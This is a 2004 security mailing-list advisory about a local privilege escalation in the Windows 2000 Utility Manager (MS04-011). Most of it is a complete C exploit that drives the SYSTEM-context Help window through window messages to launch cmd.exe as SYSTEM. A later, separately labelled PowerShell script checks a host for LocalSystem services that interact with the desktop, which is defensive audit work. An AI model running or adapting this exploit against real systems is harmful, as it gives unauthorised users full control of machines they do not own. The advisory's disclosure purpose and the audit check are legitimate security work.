[EXPL] Utility Manager Local Privileges Escalation Exploit

From: SecuriTeam (support_at_securiteam.com)
Date: 04/18/04

  • Next message: SecuriTeam: "[NT] Microsoft Windows Utility Manager Vulnerability (MS04-11)"
    To: list@securiteam.com
    Date: 18 Apr 2004 10:47:27 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      Utility Manager Local Privileges Escalation Exploit


    The Utility Manager in Microsoft Windows 2000 runs in the LocalSystem
    security context and, when asked for context help, launches winhlp32.exe
    with the same system privileges. Because its window sits on the interactive
    desktop, any local user can drive it with ordinary window messages (a
    "Shatter" style attack): the exploit below steers the File Open dialog of
    the Help window to cmd.exe and launches it, which yields a shell running as
    SYSTEM. The issue is addressed by Microsoft Security Bulletin MS04-011. The
    following exploit code can be used to test your system for the mentioned
    vulnerability.


    // By Cesar Cerrudo cesar appsecinc com
    // Local elevation of privileges exploit for Windows Utility Manager
    // Gives you a shell with system privileges
    // If you have problems try changing Sleep() values.

    #include <stdio.h>
    #include <windows.h>
    #include <commctrl.h>
    #include <Winuser.h>

    int main(int argc, char *argv[])
    {
      HWND lHandle, lHandle2;

      // file name pattern: the trailing "?" makes the Open dialog list only cmd.exe
      char sText[]="%windir%\\system32\\cmd.ex?";

      // run utility manager (runs as LocalSystem with a window on the interactive desktop)
      system("utilman.exe /start");
      Sleep(1000);

      // execute contextual help: 0x4D is the undocumented WM_KEYF1 message a window
      // receives when F1 is pressed; Utility Manager reacts by starting winhlp32.exe,
      // which inherits its SYSTEM context
      SendMessage(FindWindow(NULL, "Utility manager"), 0x4D, 0, 0);
      Sleep(1000);

      // open the File Open dialog in Windows Help (0x44D is the menu command that does it)
      PostMessage(FindWindow(NULL, "Windows Help"), WM_COMMAND, 0x44D, 0);
      Sleep(1000);

      // find open file dialog window (#32770 is the window class of common dialogs)
      lHandle = FindWindow("#32770","Open");
      if (lHandle == NULL) {
        printf("Open dialog not found; try larger Sleep() values\n");
        return 1;
      }

      // get file name input box handle
      lHandle2 = GetDlgItem(lHandle, 0x47C);

      // set text to filter listview to display only cmd.exe
      SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText);

      // send return
      SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);
      Sleep(1000);

      // get navigation bar handle
      lHandle2 = GetDlgItem(lHandle, 0x4A0);
      // send tab
      SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);
      lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);
      // get list view handle (control id 1 inside the shell view)
      lHandle2 = GetDlgItem(lHandle2, 0x1);

      // type "cmd" so the list view selects cmd.exe
      SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0); // send "c" char
      SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0); // send "m" char
      SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0); // send "d" char
      // popup context menu of the selected file
      PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);
      Sleep(1000);

      // walk the context menu and activate the chosen item; the shell runs
      // cmd.exe from the help process, i.e. as SYSTEM
      SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
      SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
      SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0); // send return
      Sleep(1000);

      SendMessage (lHandle, WM_CLOSE,0,0); // close open file dialog window

      return 0;
    }
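
    The precondition the exploit relies on is generic: a process running as
    SYSTEM that owns a window on the interactive desktop, where any logged-on
    user can send it messages. The check below, added here and not part of the
    original advisory or of Cesar Cerrudo's code, lists the services on a host
    that are configured both to run as LocalSystem and to interact with the
    desktop, which is exactly that exposure. It uses only the Win32_Service and
    Win32_OperatingSystem WMI classes and assumes Windows PowerShell 3.0 or
    later for Get-CimInstance; the list of account spellings treated as SYSTEM
    is an assumption of this example.

```powershell
# Added check (not from the original advisory): find services that run as
# LocalSystem AND may interact with the desktop. Such services put SYSTEM-owned
# windows on the interactive desktop, the precondition for a "Shatter"-style
# window-message attack like the Utility Manager case above.
# Requires Get-CimInstance (Windows PowerShell 3.0+).

# Spellings of the local system account as reported in Win32_Service.StartName
# (assumption of this example; 'LocalSystem' is the usual value).
$systemAccounts = @('LocalSystem', 'NT AUTHORITY\SYSTEM', '.\LocalSystem')

$exposed = Get-CimInstance -ClassName Win32_Service |
    Where-Object {
        $_.DesktopInteract -eq $true -and
        ($systemAccounts -contains $_.StartName)
    } |
    Select-Object Name, DisplayName, State, StartName, PathName

if ($exposed) {
    Write-Host "Services running as SYSTEM with 'interact with desktop' enabled:"
    $exposed | Format-Table -AutoSize
} else {
    Write-Host "No LocalSystem service is configured to interact with the desktop."
}

# Session 0 isolation (Windows Vista / NT 6.0 and later) keeps service windows
# off the user's desktop, so the flag alone is no longer directly reachable by
# window messages; on Windows 2000, XP and 2003 it is.
$os = Get-CimInstance -ClassName Win32_OperatingSystem
if ([version]$os.Version -lt [version]'6.0') {
    Write-Warning ("{0} ({1}) predates Session 0 isolation: SYSTEM windows on the " +
                   "console desktop are reachable by any interactive user." -f
                   $os.Caption, $os.Version)
}
```

    Run it in an elevated prompt on the host under review; a non-empty table is
    a list of processes to audit for dialogs, edit controls or menus that a
    message-driven attack could steer, the same way the exploit steers the Help
    window's File Open dialog. Uninstalling or disabling the "interact with
    desktop" flag removes the surface, and on pre-Vista systems the MS04-011
    update fixes the Utility Manager instance of it.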



    The information has been provided by Cesar Cerrudo <mailto:cesar@appsecinc.com>.


    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com


    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
